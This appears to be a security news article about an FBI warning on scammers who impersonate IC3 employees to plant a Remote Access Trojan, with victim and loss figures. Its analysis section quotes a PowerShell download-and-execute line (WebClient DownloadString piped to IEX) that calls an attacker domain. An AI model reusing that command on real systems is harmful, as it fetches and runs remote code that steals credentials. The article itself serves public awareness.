FBI Warns of Scammers Mimic as IC3 Employees to Defraud Individuals

The Federal Bureau of Investigation (FBI) has issued an urgent warning about a sophisticated phishing campaign where cybercriminals impersonate Internet Crime Complaint Center (IC3) employees to defraud individuals.

This new threat emerged in early April 2025, targeting victims through convincing spoofed emails appearing to come from legitimate IC3 domains.

Victims receive official-looking communications claiming to offer assistance with previous fraud complaints or promising financial recovery services.

The malicious actors deploy social engineering tactics, establishing trust through knowledge of publicly available information and previously reported incidents.

They request victims install “verification software” that purportedly secures communications but actually deploys a Remote Access Trojan (RAT).

Initial analysis indicates the attackers primarily target individuals who have previously filed complaints with the IC3, suggesting a possible data breach or public records mining operation.

IC3 analysts identified a particularly concerning aspect of this campaign: the malware employs sophisticated evasion techniques to bypass standard antivirus detection.

“The threat actors have implemented multi-stage encryption and fileless execution methods that make traditional detection extremely difficult,” noted Senior IC3 Cyber Analyst Maria Chen.

The infection has affected over 230 individuals nationwide, with financial losses exceeding $1.2 million in the past three weeks.

Infection Mechanism Analysis

The malware’s primary infection vector relies on convincing victims to download and execute a seemingly benign PDF attachment.

When opened, the document displays legitimate-looking FBI branding while silently executing PowerShell commands in the background:-

$c = New-Object System.Net.WebClient
$c.DownloadString('https://ic3-secure-portal.net/verify.txt') | IEX

This command fetches and executes additional code from the attacker’s server, establishing persistence through scheduled tasks and registry modifications while exfiltrating banking credentials and authentication tokens.